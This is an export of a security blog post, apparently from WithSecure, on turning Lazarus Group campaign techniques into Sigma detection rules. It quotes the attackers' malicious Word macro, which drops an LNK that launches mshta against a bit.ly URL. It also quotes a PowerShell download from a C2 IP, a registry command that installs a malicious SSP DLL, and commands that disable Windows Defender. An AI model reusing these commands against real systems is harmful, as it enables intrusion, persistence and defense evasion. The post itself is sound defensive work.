{"id":10533,"date":"2020-09-25T09:00:00","date_gmt":"2020-09-25T08:00:00","guid":{"rendered":"https:\/\/www.withsecure.com\/resources-hub\/w-labs\/catching-lazarus-threat-intelligence-to-real-detection-logic-part-one\/"},"modified":"2026-05-25T10:21:21","modified_gmt":"2026-05-25T09:21:21","slug":"catching-lazarus-threat-intelligence-to-real-detection-logic-part-one","status":"publish","type":"lab_item","link":"https:\/\/www.withsecure.com\/fr\/ressources\/w-labs\/catching-lazarus-threat-intelligence-to-real-detection-logic-part-one\/","title":{"rendered":"Catching Lazarus: Threat Intelligence to Real Detection Logic &#8211; Part One"},"content":{"rendered":"<section\n    class=\"wp-block-one-column-block edwp-block js-wp-block-one-column-block wp-block-one-column-block--content-1 wp-block-one-column-block--meta-sharing layout--spacing-xxxxl-top layout--spacing-xl-bottom\"\n    >\n    <div class=\"wp-block-one-column-block__container\">\n                                                                                                                            <div class='wp-block-one-column-block__meta-sharing-grid'><div class=\"wp-component-content wp-component-content--default wp-block-one-column-block__content fade-in\">\n            <h1 class=\"wp-component-heading text--h2 wp-component-content__title\">\n    Catching Lazarus: Threat Intelligence to Real Detection Logic &#8211; <span class=\"blue-text\">Part One<\/span><\/h1>                    <div class=\"wp-component-content__inner\">\n                                                    <div class=\"wp-component-content__meta\">\n                                                                            <span class=\"wp-component-content__meta-categories\">\n                                                                    <span class=\"wp-component-content__meta-category\">\n                                        Attack Detection                                    <\/span>\n                              
                                      <span class=\"wp-component-content__meta-category\">\n                                        Endpoint Security                                    <\/span>\n                                                                    <span class=\"wp-component-content__meta-category\">\n                                        Threat intelligence                                    <\/span>\n                                                            <\/span>\n                                                                                                    <span class=\"wp-component-content__meta-date\">\n                                25 septembre, 2020                            <\/span>\n                                                                    <\/div>\n                                            <\/div>\n                <\/div><section\n    class=\"wp-block-sharing-icons edwp-block wp-block-sharing-icons--disable-border wp-block-sharing-icons--content-1 wp-block-sharing-icons--disable-container wp-block-one-column-block__sharing fade-in wp-block-one-column-block__sharing fade-in\"\n    >\n    <div class=\"wp-block-sharing-icons__container\">\n        <div class=\"wp-block-sharing-icons__inner\">\n                            <p class=\"wp-block-sharing-icons__title fade-in\">\n                    Partager cette information                <\/p>\n                        <div class=\"wp-component-socials wp-component-socials--dark-mode\">\n    \n            <a href=\"https:\/\/www.linkedin.com\/shareArticle?mini=true&#038;url=https:\/\/www.withsecure.com\/fr\/ressources\/w-labs\/catching-lazarus-threat-intelligence-to-real-detection-logic-part-one\/&#038;title=Catching%20Lazarus:%20Threat%20Intelligence%20to%20Real%20Detection%20Logic%20&#8211;%20Part%20One\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link\" title=\"Partager sur LinkedIn\">\n            <svg class='edwp-icon edwp-icon--xlg 
js-icon ' aria-hidden='true'>\n                <use xlink:href='#linkedin'><\/use>\n            <\/svg>        <\/a>\n    \n            <a href=\"http:\/\/x.com\/share?text=Catching Lazarus: Threat Intelligence to Real Detection Logic &#8211; Part One&#038;url=https:\/\/www.withsecure.com\/fr\/ressources\/w-labs\/catching-lazarus-threat-intelligence-to-real-detection-logic-part-one\/\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link wp-component-socials__link--twitter\" title=\"Partager sur X (Twitter)\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#x'><\/use>\n            <\/svg>        <\/a>\n    \n    \n    <\/div>\n        <\/div>\n    <\/div>\n<\/section>\n<\/div>                                                                                <\/div>\n<\/section>\n\n\n<section\n    class=\"wp-block-one-column-block edwp-block js-wp-block-one-column-block wp-block-one-column-block--content-1 layout--spacing-xxxl-bottom\"\n    >\n    <div class=\"wp-block-one-column-block__container\">\n                                                                                                                                    <div class=\"wp-component-image__wrapper wp-block-one-column-block__image fade-in\">\n                    <figure class=\"wp-component-image__figure\">\n                                            <img loading=\"lazy\" decoding=\"async\" width=\"1200\" height=\"800\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_insights.jpg.webp\" class=\"wp-component-image\n                            wp-component-image--desktop\n                            wp-component-image--mobile\n                            wp-component-image--ratio-content-25-1 wp-component-image--fit-cover\" alt=\"\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_insights.jpg.webp 1200w, 
https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_insights-300x200.jpg.webp 300w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_insights-1024x683.jpg.webp 1024w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_insights-768x512.jpg.webp 768w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_insights-447x298.jpg.webp 447w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_insights-219x146.jpg.webp 219w\" sizes=\"auto, (max-width: 1200px) 100vw, 1200px\" \/>                                                    <\/figure>\n                    <\/div>\n                                                                                <\/div>\n<\/section>\n\n\n<section\n    class=\"wp-block-two-column-block edwp-block js-wp-block-two-column-block wp-block-two-column-block--content-1 wp-block-two-column-block__left--align-y-top wp-block-two-column-block__right--align-y-top wp-block-two-column-block--split-sidebar layout--none-top layout--spacing-xxxl-bottom\"\n    data-block-id=\"block_21e7c2a63f83fdf1029f587bcb5b5d0e\"\n    >\n    <div class=\"wp-block-two-column-block__container row-load\">\n                                                        <div class=\"wp-block-two-column-block__left\">\n                                    <div class=\"wp-component-authors-list wp-block-two-column-block__authors\">\n                    <p class=\"wp-component-authors-list__title\">\n                Authors            <\/p>\n        \n        <div class=\"wp-component-authors-list__items\">\n                                                <div class=\"wp-component-author-card \">\n    <div class=\"wp-component-author-card__media\">\n                    <span class=\"wp-component-author-card__photo-placeholder\" aria-hidden=\"true\">\n                <svg viewBox=\"0 0 64 64\" role=\"presentation\" focusable=\"false\">\n                    <path d=\"M32 34c-8.1 0-14.7 
6.6-14.7 14.7v3.5h29.4v-3.5C46.7 40.6 40.1 34 32 34z\"><\/path>\n                    <path d=\"M32 31.2c6 0 10.9-4.9 10.9-10.9S38 9.4 32 9.4s-10.9 4.9-10.9 10.9S26 31.2 32 31.2z\"><\/path>\n                <\/svg>\n            <\/span>\n            <\/div>\n    <div class=\"wp-component-author-card__content\">\n                    <h3 class=\"wp-component-author-card__name\">Guillaume Couchard<\/h3>\n        \n                \n            <\/div>\n\n<\/div>\n\n                                                                <div class=\"wp-component-author-card \">\n    <div class=\"wp-component-author-card__media\">\n                    <span class=\"wp-component-author-card__photo-placeholder\" aria-hidden=\"true\">\n                <svg viewBox=\"0 0 64 64\" role=\"presentation\" focusable=\"false\">\n                    <path d=\"M32 34c-8.1 0-14.7 6.6-14.7 14.7v3.5h29.4v-3.5C46.7 40.6 40.1 34 32 34z\"><\/path>\n                    <path d=\"M32 31.2c6 0 10.9-4.9 10.9-10.9S38 9.4 32 9.4s-10.9 4.9-10.9 10.9S26 31.2 32 31.2z\"><\/path>\n                <\/svg>\n            <\/span>\n            <\/div>\n    <div class=\"wp-component-author-card__content\">\n                    <h3 class=\"wp-component-author-card__name\">Qimin Wang<\/h3>\n        \n                \n            <\/div>\n\n<\/div>\n\n                                    <\/div>\n\n                    <div class=\"wp-component-authors-list__toggle js-authors-list-toggle\">\n                <button\n                    class=\"wp-component-authors-list__toggle-btn btn btn--tertiary js-authors-list-btn\"\n                    type=\"button\"\n                    aria-expanded=\"false\"\n                >\n                    Voir tous les auteurs                    <svg class='edwp-icon edwp-icon--reg js-icon ' aria-hidden='true'>\n                <use xlink:href='#chevron'><\/use>\n            <\/svg>                <\/button>\n                <div\n                    
class=\"wp-component-authors-list__items js-authors-list-extra\"\n                    hidden\n                >\n                                                                        <div class=\"wp-component-author-card \">\n    <div class=\"wp-component-author-card__media\">\n                    <span class=\"wp-component-author-card__photo-placeholder\" aria-hidden=\"true\">\n                <svg viewBox=\"0 0 64 64\" role=\"presentation\" focusable=\"false\">\n                    <path d=\"M32 34c-8.1 0-14.7 6.6-14.7 14.7v3.5h29.4v-3.5C46.7 40.6 40.1 34 32 34z\"><\/path>\n                    <path d=\"M32 31.2c6 0 10.9-4.9 10.9-10.9S38 9.4 32 9.4s-10.9 4.9-10.9 10.9S26 31.2 32 31.2z\"><\/path>\n                <\/svg>\n            <\/span>\n            <\/div>\n    <div class=\"wp-component-author-card__content\">\n                    <h3 class=\"wp-component-author-card__name\">Thiam Loong Siew<\/h3>\n        \n                \n            <\/div>\n\n<\/div>\n\n                                                            <\/div>\n            <\/div>\n            <\/div>\n<nav\n    class=\"wp-component-content-navigation wp-block-two-column-block__content-nav js-content-navigation\"\n    data-bem-base=\"wp-component-content-navigation\"\n    data-nav-column=\"left\"\n    data-nav-type=\"auto\"\n>\n            <p class=\"wp-component-content-navigation__title\">\n            Content        <\/p>\n    \n    <div class=\"wp-component-content-navigation__mobile\">\n        <label class=\"wp-component-content-navigation__mobile-label\">\n            <span class=\"wp-component-content-navigation__mobile-label-text\">\n                Navigation dans le contenu            <\/span>\n            <select class=\"wp-component-content-navigation__select js-content-navigation-select\">\n                <option value=\"\">\n                    S\u00e9lectionnez une section                <\/option>\n                            <\/select>\n        <\/label>\n    <\/div>\n\n 
   <div class=\"wp-component-content-navigation__desktop\">\n        <div class=\"wp-component-content-navigation__list-wrapper\">\n            <span\n                class=\"wp-component-content-navigation__indicator js-content-navigation-indicator\"\n                aria-hidden=\"true\"\n            ><\/span>\n            <ul class=\"wp-component-content-navigation__list js-content-navigation-list\">\n                            <\/ul>\n        <\/div>\n    <\/div>\n<\/nav>\n<section\n    class=\"wp-block-sharing-icons edwp-block wp-block-sharing-icons--disable-border wp-block-sharing-icons--disable-container wp-block-two-column-block__share wp-block-two-column-block__hide-mobile wp-block-two-column-block__share wp-block-two-column-block__hide-mobile\"\n    >\n    <div class=\"wp-block-sharing-icons__container\">\n        <div class=\"wp-block-sharing-icons__inner\">\n                            <p class=\"wp-block-sharing-icons__title fade-in\">\n                    Share this story                <\/p>\n                        <div class=\"wp-component-socials wp-component-socials--dark-mode\">\n    \n            <a href=\"https:\/\/www.linkedin.com\/shareArticle?mini=true&#038;url=https:\/\/www.withsecure.com\/fr\/ressources\/w-labs\/catching-lazarus-threat-intelligence-to-real-detection-logic-part-one\/&#038;title=Catching%20Lazarus:%20Threat%20Intelligence%20to%20Real%20Detection%20Logic%20&#8211;%20Part%20One\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link\" title=\"Partager sur LinkedIn\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#linkedin'><\/use>\n            <\/svg>        <\/a>\n    \n            <a href=\"http:\/\/x.com\/share?text=Catching Lazarus: Threat Intelligence to Real Detection Logic &#8211; Part One&#038;url=https:\/\/www.withsecure.com\/fr\/ressources\/w-labs\/catching-lazarus-threat-intelligence-to-real-detection-logic-part-one\/\" 
target=\"_blank\" rel=\"noreferrer noopener\" class=\"wp-component-socials__link wp-component-socials__link--twitter\" title=\"Partager sur X (Twitter)\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#x'><\/use>\n            <\/svg>        <\/a>\n    \n    \n    <\/div>\n        <\/div>\n    <\/div>\n<\/section>\n                <\/div>\n                                                <div class=\"wp-block-two-column-block__right\">\n                                <div class=\"wp-component-paragraph wp-block-two-column-block__paragraph \">\n    <h2>Introduction<\/h2>\n<p>This is the first of two blog posts from the F-Secure Countercept team discussing how the Tactics, Techniques and Procedures (TTPs) used by the Lazarus Group in a recent campaign can be turned into detection logic. In this post we will share open source Sigma<a href=\"https:\/\/github.com\/Neo23x0\/sigma\" target=\"_blank\" rel=\"noopener\">[1]<\/a> rules and actionable detection insights to enable blue teams to detect attacks using the same or similar techniques. The foundation of this work is a report<a href=\"https:\/\/labs.withsecure.com\/publications\/ti-report-lazarus-group-cryptocurrency-vertical\/\" target=\"_blank\" rel=\"noopener\">[2]<\/a> from the F-Secure Threat Intelligence Team which exposed and detailed some of the Lazarus Group\u2019s current modus operandi. Our second blog will look at further techniques employed by the Lazarus Group once they establish a foothold on a network.<\/p>\n<p>From the Threat Intelligence report, we know that the Lazarus Group employed varying techniques across the MITRE ATT&amp;CK\u00ae Matrix<a href=\"https:\/\/attack.mitre.org\/matrices\/enterprise\/\" target=\"_blank\" rel=\"noopener\">[3]<\/a> in their attack. The reason for this blog\u2019s focus on TTPs is twofold. 
First, TTPs are more difficult and costly to change, as compared to Indicators of Compromise (IOCs) such as filenames, hashes and IP addresses. This makes detection based on TTPs more reliable, as blue teams can detect malicious activity even when IOCs change. Second, TTPs can be common across threat actors, and detecting the TTPs used by the Lazarus Group will aid the detection of many other threat actors. For example, according to MITRE, detecting the technique \u201cSigned Binary Proxy Execution: Mshta\u201d provides coverage for 10 other APT groups<a href=\"https:\/\/attack.mitre.org\/techniques\/T1218\/005\/\" target=\"_blank\" rel=\"noopener\">[4]<\/a> (this detail is in the \u201cProcedure Examples\u201d section for each MITRE technique).<\/p>\n<p>At F-Secure Countercept, we use a signature format similar to Sigma rules in our detection and response operations. Since Sigma rules provide a standardized open source signature format, which allows blue teams to build detections that can be applied to many different SIEM log formats, we aim to provide detection value by contributing Sigma rules specific to the detection of each relevant MITRE technique.<\/p>\n<p>While Sigma rules offer a powerful and flexible rule syntax for detection, using detection rules alone is not always the best approach for threat detection. Blue teams can also benefit from using hunt queries (using Jupyter Notebooks<a href=\"https:\/\/jupyter.org\/\" target=\"_blank\" rel=\"noopener\">[5]<\/a> for example) when more complex correlations between different datatypes are required for an accurate detection. While hunt queries allow more flexibility in working with different datatypes, they can consume more resources, which is why classic detection rules are sometimes preferred. 
Over this and the following blog, we will also highlight instances where hunt queries could aid in the detection of malicious activity.<\/p>\n<h3>Breaking down the Lazarus Group campaign with MITRE<\/h3>\n<p>The following sections in this document map the key attack techniques used by the Lazarus Group onto the relevant MITRE ATT&amp;CK\u00ae Matrix tactics. We then discuss how to detect these techniques using Sigma rules.<\/p>\n<p>The Sigma rules created for this report are marked in bold in the table below and are provided in the F-Secure Countercept GitHub repository<a href=\"https:\/\/github.com\/countercept\/lazarus-sigma-rules\" target=\"_blank\" rel=\"noopener\">[6]<\/a>. Existing Sigma rules are also listed below, as some techniques were already covered.<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/2020-09-16-lazarus-blog-chart-image-f-secure-2000x1200px2.jpg.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<h2>Initial Access<\/h2>\n<h3>T1566.003 \u2013 Phishing: Spearphishing via Service<\/h3>\n<p>The Lazarus Group gained initial access to the target organization by sending a phishing document to a systems administrator via their personal LinkedIn account. The document masqueraded as a legitimate job advert. The embedded macro code was successfully executed on the target organization\u2019s endpoint when the victim opened the document and enabled macro execution.<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/2020-09-17-lazarus-blog-images-diagrams-f-secure-2000x1200px-final-v2-1.jpg.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Detection<\/p>\n<p>It can be challenging to detect malicious documents, as the embedded code is often obfuscated to evade detection by anti-virus and static file analysis. 
That said, an effective detection approach is to look for malicious events that occur once the file is opened and the embedded payload is executed.<\/p>\n<p>To demonstrate this, we downloaded and executed a malicious Word document<a href=\"https:\/\/www.virustotal.com\/gui\/file\/7446efa798cfa7908e78e7fb2bf3ac57486be4d2edea8a798683c949d504dee6\/details\" target=\"_blank\" rel=\"noopener\">[7]<\/a> associated with the Lazarus Group\u2019s campaign to investigate the behavior of the embedded payload. Upon execution of the macro contained in the document, there are no \u2018quick wins\u2019 for detection opportunities, such as winword.exe launching processes such as PowerShell or cmd. We also did not observe other signs of suspicious activity, such as external network connections being created directly from the winword.exe process.<\/p>\n<p>Instead we observed that the document writes a LNK file (named \u2018esk.lnk\u2019) to the user\u2019s temporary file directory (determined through the GetSpecialFolder(2) method), and subsequently launches the created shortcut file with Explorer.exe. 
This process can be seen in more detail by examining the macro code embedded in the Word document:<\/p>\n<pre><code class=\"language-bash\">Sub AutoOpen()\nOn Error Resume Next\nSet FSS = CreateObject(&quot;Scripting.FileSystemObject&quot;)\nLPath = FSS.GetSpecialFolder(2) &amp; &quot;\\esk.l&quot; &amp; &quot;nk&quot;\nExPath = &quot;explorer &quot; &amp; LPath\nSet SHH = CreateObject(&quot;wscript.shell&quot;)\nSet LKO = SHH.CreateShortcut(LPath)\nLKO.TargetPath = &quot;mshta&quot;\nLKO.Arguments = &quot;ht&quot; &amp; &quot;tps:\/&quot; &amp; &quot;\/bi&quot; &amp; &quot;t.ly\/&quot; &amp; &quot;2vwLE0m&quot;\nLKO.Save\nSHH.Run ExPath\nActiveDocument.Content.Font.Color = 0\nActiveDocument.ActiveWindow.View.Type = wdPrintView\nActiveDocument.Content.Font.Size = 12\nDim Splash As Shape\nFor Each Splash In ActiveDocument.Shapes\nIf Splash.AlternativeText = &quot;G&quot; &amp; &quot;DP&quot; &amp; &quot;R&quot; Then\nSplash.Width = Splash.Height = 0\nEnd If\nNext Splash\nActiveDocument.ActiveWindow.View.ShowHiddenText = False\nActiveDocument.ActiveWindow.View.ReadingLayout = False\nActiveDocument.Content.Font.Hidden = False\nEnd Sub<\/code><\/pre>\n<p>Two Sigma rules have been written to detect this anomalous behavior these can be found in our GitHub repository and are named win_word_create_lnk and win_word_launch_explorer respectively.<\/p>\n<p>win_word_create_lnk<\/p>\n<p>Based on F-Secure Countercept\u2019s endpoint telemetry, it is common behavior for the Microsoft Word process (winword.exe) to create shortcut files for every Word document it opens. 
These files are usually stored in one of the following directories:<\/p>\n<ul>\n<li>%UserProfile%\\AppData\\Roaming\\Microsoft\\Office\\Recent\\<\/li>\n<li>%UserProfile%\\AppData\\Roaming\\Microsoft\\Word\\<\/li>\n<\/ul>\n<p>With the exclusion of these two directories from the Sigma rule, we observed very few false positives of legitimate shortcut files being created in other directories.<\/p>\n<p>The detection logic of this rule could also be extended to cover additional Office applications (such as Excel) and to detect other high-risk filetypes being created, such as executable files or VBA scripts.<\/p>\n<p>win_word_launch_explorer<\/p>\n<p>From our telemetry, we observed that the parent-child relationship of Winword.exe launching Explorer.exe was rare, and non-existent in many networks. However, there are some client networks where false positives occurred due to more customised use of Word documents within the organization. Therefore, blue teams working with noisy networks may consider filtering for \u201c.lnk\u201d (and other high-risk extensions) in the command line arguments of Explorer.exe for a higher fidelity rule.<\/p>\n<h2>Execution<\/h2>\n<h3>T1059.005 \u2013 Command and Scripting Interpreter: Visual Basic<\/h3>\n<p>Execution of the .lnk file dropped by the malicious office document results in Mshta.exe connecting to a \u201cbit.ly\u201d link to download a secondary payload. 
The \u201cbit.ly\u201d link redirected to a Command and Control (C2) domain from which a VBScript was retrieved and executed to perform enumeration and collect further information on the host.<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/2020-09-17-lazarus-blog-images-diagrams-f-secure-2000x1200px-final-v25.jpg.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Detection<\/p>\n<p>From the technical details covered in the Weibu Intelligence Bureau report<a href=\"https:\/\/x.threatbook.cn\/nodev4\/vb4\/article?threatInfoID=2371\" target=\"_blank\" rel=\"noopener\">[8]<\/a>, we were able to simulate the Mshta execution of a VBScript hosted on a web server. It became clear in the simulation that the malicious VBScript hosted on the C2 domain was accessed and executed within the Mshta process. This means that there will not be any process creation telemetry that can point to the execution of the VBScript.<\/p>\n<p>Nonetheless, the execution of VBScript can be detected by analyzing image load events, which are logged whenever a module is loaded into a process<a href=\"https:\/\/www.ultimatewindowssecurity.com\/securitylog\/encyclopedia\/event.aspx?eventid=90007\" target=\"_blank\" rel=\"noopener\">[9]<\/a>. In order to execute VBScript, the Mshta process will have to load the \u201cvbscript.dll\u201d module from disk which contains API functions for VBScript. The Sigma rule created to detect this behavior can be found on our GitHub and is named win_mshta_load_vbscript.<\/p>\n<h3>T1059.001 \u2013 Command and Scripting Interpreter: PowerShell<\/h3>\n<p>Threat actors are known to commonly leverage PowerShell in their attacks due to its efficacy in interacting with Windows subsystems. 
This is also the case for Lazarus Group, where a PowerShell script was utilized to retrieve further payloads from their C2 domain:<\/p>\n<p>C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -w Hidden -ep Bypass -file C:Users\\&lt;USER&gt;\\AppData\\Local\\Temp\\usoclient.ps1 66.181.166[.]15:8080\/uc 188652471<\/p>\n<p>Detection<\/p>\n<p>As PowerShell is also a common tool among system administrators, a simple detection of its execution will often result in significant false positives. However, there are certain arguments that tend to be more suspicious than others, such as setting the window style to \u201cHidden\u201d, and the temporary \u201cBypass\u201d of the execution policy. There is an existing Sigma rule <a href=\"https:\/\/github.com\/Neo23x0\/sigma\/blob\/master\/rules\/windows\/powershell\/powershell_suspicious_invocation_specific.yml\" target=\"_blank\" rel=\"noopener\">[10]<\/a> to detect the presence of these arguments.<\/p>\n<p>In addition to the above, alerting on PowerShell arguments that contain references to external IP addresses could be an effective detection mechanism. For MDR providers (such as F-Secure Countercept) this type of detection rule will often result in false positives due to the number of administrative scripts on client estates which exhibit this behavior. However, for internal detection teams this could prove to be a high-fidelity detection rule once the known administrative scripts are filtered out. The Sigma rule created to detect this behavior can be found on our GitHub and is named win_powershell_ip_args.<\/p>\n<p>For MDR providers \u2013 or for detection in \u2018noisy\u2019 estates \u2013 hunting instead of alerting for this behavior is probably the most effective approach. Searching for PowerShell processes launched with arguments containing external IP addresses, and then aggregating the results on the PowerShell arguments, should result in an effective hunt query to look for this behavior. 
If you are interested in exploring hunt queries, SpecterOps have a fantastic blog series<a href=\"https:\/\/posts.specterops.io\/threat-hunting-with-jupyter-notebooks-part-1-your-first-notebook-9a99a781fde7\" target=\"_blank\" rel=\"noopener\">[11]<\/a> covering threat hunting with Jupyter notebooks.<\/p>\n<h2>Persistence<\/h2>\n<h3>T1547.005 \u2013 Boot or Logon Autostart Execution: Security Support Provider (SSP)<\/h3>\n<p>Windows SSP DLLs provide applications access to Windows authentication methods such as NTLM and Kerberos<a href=\"https:\/\/docs.microsoft.com\/en-us\/windows\/win32\/rpc\/security-support-providers-ssps-\" target=\"_blank\" rel=\"noopener\">[12]<\/a>. SSP DLLs are loaded into the Local Security Authority (LSA) process on every machine boot and will execute with SYSTEM privileges once loaded. Lazarus Group added a malicious \u201cLSCC.dll\u201d file as an SSP, via the following command:<\/p>\n<p>reg add HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Lsa \/v Security Packages \/t REG_MULTI_SZ \/d lssc \/f<\/p>\n<p>As Sean Metcalf pointed out in his blog<a href=\"https:\/\/adsecurity.org\/?p=1760\" target=\"_blank\" rel=\"noopener\">[13]<\/a>, adding a new SSP is quite easy and is a well-known technique used by many attackers. In fact, PowerSploit has an Install-SSP function in its Persistence module <a href=\"https:\/\/github.com\/PowerShellMafia\/PowerSploit\/blob\/master\/Persistence\/Persistence.psm1\" target=\"_blank\" rel=\"noopener\">[14]<\/a>, allowing threat actors to add a new malicious SSP as the Lazarus Group did.<\/p>\n<p>Detection<\/p>\n<p>This technique consists of two simple steps. First, add the malicious DLL in \u201cC:\\Windows\\System32\\\u201d. Next, update the Security Packages registry key with the name of the DLL which was added in System32. 
A single command can be used to achieve this step, as shown in the above code block by Lazarus Group.<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/2020-09-17-lazarus-blog-images-diagrams-f-secure-2000x1200px-final-v24.jpg.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Detection is therefore straightforward and can be achieved by looking at the \u201cSecurity Packages\u201d registry key modification. There is already an existing Sigma rule<a href=\"https:\/\/github.com\/Neo23x0\/sigma\/blob\/master\/rules\/windows\/registry_event\/sysmon_ssp_added_lsa_config.yml\" target=\"_blank\" rel=\"noopener\">[15]<\/a> for this. This rule will detect any changes to this specific registry key, so the method used to modify the key does not matter. For example, the threat actor could use PowerShell cmdlets<a href=\"https:\/\/devblogs.microsoft.com\/scripting\/weekend-scripter-use-powershell-to-easily-modify-registry-property-values\/\" target=\"_blank\" rel=\"noopener\">[16]<\/a> or even the user interface application Regedit.exe instead of Reg commands.<\/p>\n<h2>Defense Evasion<\/h2>\n<h3>T1218.005 \u2013 Signed Binary Proxy Execution: Mshta<\/h3>\n<p>Leveraging pre-installed Windows binaries to bypass traditional signature-based defenses and execute malicious content has been a common technique utilized by threat actors.<\/p>\n<p>As pointed out earlier, the Lazarus Group, for instance, was observed using Mshta.exe to execute malicious scripts via a \u201cbit.ly\u201d redirect as seen below:<\/p>\n<p>mshta.exe https:\/\/bit[.]ly\/2vvLE0n<\/p>\n<p>To find out more about these binaries, often referred to as \u201cLiving Off the Land Binaries\u201d (LOLBin), blue teams may refer to the LOLBAS project<a href=\"https:\/\/lolbas-project.github.io\/#\/execute\" target=\"_blank\" rel=\"noopener\">[17]<\/a> for their excellent documentation of all discovered LOL binaries and scripts.<\/p>\n<p>Detection<\/p>\n<p>Signed binaries like 
Mshta.exe are often used for legitimate purposes, so from a detection perspective it is crucial to differentiate between legitimate and malicious usage. One way of approaching this would be to analyze the command arguments. Based on historical endpoint data from F-Secure Countercept, use of \u201cbit.ly\u201d and other common redirection or codeshare sites like \u201cpastebin.com\u201d in command arguments is rare and uncommon. A Sigma rule has thus been written to detect binaries launched with \u201cbit.ly\u201d links and other popular codeshare sites in the arguments. Web browser binaries are commonly observed false positives and have been excluded from the detection. The Sigma rule created to detect this behavior can be found on our GitHub and is named win_nonbrowser_susp_url.<\/p>\n<p>Another way to check for malicious usage of Mshta is to look at the child process(es) launched by the executable. To perform post-exploitation tasks, malicious scripts often launch shells such as Cmd.exe. Since Mshta proxies the execution of the script content, this will result in process creation telemetry where Mshta launches Cmd.exe as a child process.<\/p>\n<p>According to the Weibu Intelligence Bureau report<a href=\"https:\/\/x.threatbook.cn\/nodev4\/vb4\/article?threatInfoID=2371\" target=\"_blank\" rel=\"noopener\">[18]<\/a> this is also the case for Lazarus Group\u2019s campaign, where the bit.ly link executed by Mshta contained VBScript which made use of the WshShell object to launch Cmd.exe.  
An existing Sigma rule is available to detect suspicious process creation by Mshta<a href=\"https:\/\/github.com\/Neo23x0\/sigma\/blob\/master\/rules\/windows\/process_creation\/win_mshta_spawn_shell.yml\" target=\"_blank\" rel=\"noopener\">[19]<\/a>.<\/p>\n<h3>T1562.001 \u2013 Impair Defenses: Disable or Modify Tools<\/h3>\n<p>Disabling Windows Defender<\/p>\n<p>Once the Lazarus group established a foothold using the above LOLBin technique, the actor used the following PowerShell commands to disable Windows Defender monitoring as one of their first actions on each host they accessed:<\/p>\n<pre><code class=\"language-bash\">cmd.exe \/c C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\nSet-MpPreference -DisableBehaviorMonitoring $false 2&gt;&amp;1\n\ncmd.exe \/c C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe \nSet-MpPreference -DisableRealtimeMonitoring $true 2&gt;&amp;1<\/code><\/pre>\n<p>Detection<\/p>\n<p>The commands above leverage the built-in Windows Defender cmdlets<a href=\"https:\/\/docs.microsoft.com\/en-us\/powershell\/module\/defender\/set-mppreference?view=win10-ps\" target=\"_blank\" rel=\"noopener\">[20]<\/a>, which are often used for legitimate purposes. Detection for this can be as simple as filtering for the parameters \u201cDisableRealTimeMonitoring\u201d OR \u201cDisableBehaviorMonitoring\u201d in command line arguments or PowerShell script blocks.<\/p>\n<p>However, some Integrated Development Environment (IDE) applications, such as those developed by JetBrains, are known to check for these Windows Defender parameters by using the Get-MpPreference cmdlet. Therefore, blue teams may wish to filter for the \u201cSet-MpPreference\u201d command alongside the two parameters. Otherwise, known false positives such as \u201cPycharm64.exe\u201d and binaries residing in the \u201cJetbrains\u201d path can be excluded. 
The latter option results in a more generic rule which also detects enumeration of the two parameters. The Sigma rule created to detect this behavior can be found on our GitHub and is named win_powershell_disable_windefender.<\/p>\n<h2>Conclusion<\/h2>\n<p>In this first part of our two-part blog post series, we demonstrated how blue teams can capitalize on the technical insights from threat intelligence reports to build detection logic and actionable detection rules. Although the Lazarus Group used specific commands to carry out each technique, we showed that with some additional research blue teams can create powerful detection rules which cover a larger set of attack vectors. We also showed that although the Lazarus group used various techniques and tools to avoid detection as they gained access to the victim network, there were still plenty of detection opportunities for blue teams to identify the threat actor\u2019s activities.<\/p>\n<p>Although we have focused purely on the detection aspect throughout this blog post, it is also notable that the Lazarus Group relied on techniques which could have been prevented by implementing common security controls. For example, limiting or disabling macro execution for documents from untrusted sources would have prevented the execution of the malicious document which provided the initial foothold on the victim network. Other controls, such as network proxy content filtering or domain categorization, could also have prevented the initial C2 connection, or the subsequent connections to other domains used by the threat actor to download additional tooling.<\/p>\n<p>In this blog post we covered the Initial Access, Execution, Persistence and some of the Defense Evasion phases from the MITRE ATT&amp;CK\u00ae Matrix and provided relevant Sigma rules and detection tips. As every network is different, we recommend studying the provided Sigma rules before implementing them in your environment. 
